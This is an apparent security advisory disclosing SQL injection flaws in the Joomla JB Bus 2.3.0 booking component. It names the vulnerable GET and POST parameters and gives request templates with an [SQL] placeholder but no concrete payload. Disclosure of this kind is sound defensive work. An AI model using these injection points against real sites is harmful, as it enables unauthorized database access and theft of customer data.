Joomla JB Bus 2.3.0 SQL Injection

`################################################  
#Title: Joomla JB Bus 2.3.0 SQL Injection  
#Credit: Bilal KARDADOU  
#Vendor: https://joombooking.com  
#URL:  
https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jbtransport/  
#Product: 'Joomla JB Bus component version 2.3.0'  
#Developer: Joombooking  
#Last updated: Apr 19 2017  
#Date added: Nov 19 2014  
#License: GPLv2 or later  
#Type: Paid download  
#Price: $99  
#Google Dork: N/A  
################################################  
#  
# Product & Service Introduction:  
#  
# JB Bus is a joomla component which provides the functions for create  
online bus booking website.  
#  
# GET -p [id]  
#  
http://127.0.0.1/[PATH]/index.php?option=com_bookpro&view=routemap&tmpl=component&id=[SQL]  
#  
# POST -p [bustrip_id]  
# http://127.0.0.1/[PATH]/hdsha/391-393/da-nang-city-hanoi?view=busconfirm  
# Data:  
bustrip_id=[SQL]&listseat_199=7%2C8%2C9&seat=7%2C8%2C9&return_seat=&Itemid=113  
#  
# POST -p [filter_from] & [filter_to]  
# http://127.0.0.1/[PATH]/hdsha?view=bustrips  
# Data:  
filter_roundtrip=0&filter_from=[SQL]&filter_to=[SQL]&filter_start=12-22-2017&filter_end=&filter_adult%5B1%5D=2&filter_adult%5B3%5D=1&btnSubmit=Find+trip&Itemid=113&45f2fd16eadb10e847739d13182a2ec2=1  
#  
# PoC:  
# https://prnt.sc/hqj6d2  
# https://prnt.sc/hqj6oz  
#  
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)  
################################################  
  
--   
  
[image: 2017-04-04_21-41-59.png]  
  
Bilal Kardadou  
IT Security Consultant & Bug Bounty Hunter  
  
  
[image: linkedin.png] <https://www.linkedin.com/in/kardadou/>[image:  
pinterest.png] <https://packetstormsecurity.com/files/author/12802/>[image:  
facebook.png] <https://www.facebook.com/o9n75oo9754hmoobboomwooow986yh>  
  
00212675-092778  
  
The more control you impose the less control you have.  
`